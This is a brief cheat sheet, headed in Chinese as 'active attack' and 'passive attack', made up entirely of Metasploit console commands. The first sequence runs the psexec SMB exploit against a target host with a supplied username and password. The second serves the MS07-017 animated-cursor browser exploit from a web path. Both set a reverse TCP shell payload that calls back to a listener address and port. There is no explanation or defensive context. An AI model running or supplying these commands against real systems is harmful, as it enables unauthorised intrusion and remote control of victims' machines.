主动攻击

  1. use exploit/windows/smb/psexec
  2. set RHOST 192.168.1.100
  3. set PAYLOAD windows/shell/reverse_tcp
  4. set LHOST 192.168.1.1
  5. set LPORT 4444
  6. set SMBUSER user1
  7. set SMBPASS pass1
  8. exploit

被动攻击

  1. use exploit/windows/browser/ms07_017_ani_loadimage_chunksize
  2. set URIPATH /
  3. set PAYLOAD windows/shell/reverse_tcp
  4. set LHOST 192.168.1.1
  5. set LPORT 4444
  6. exploit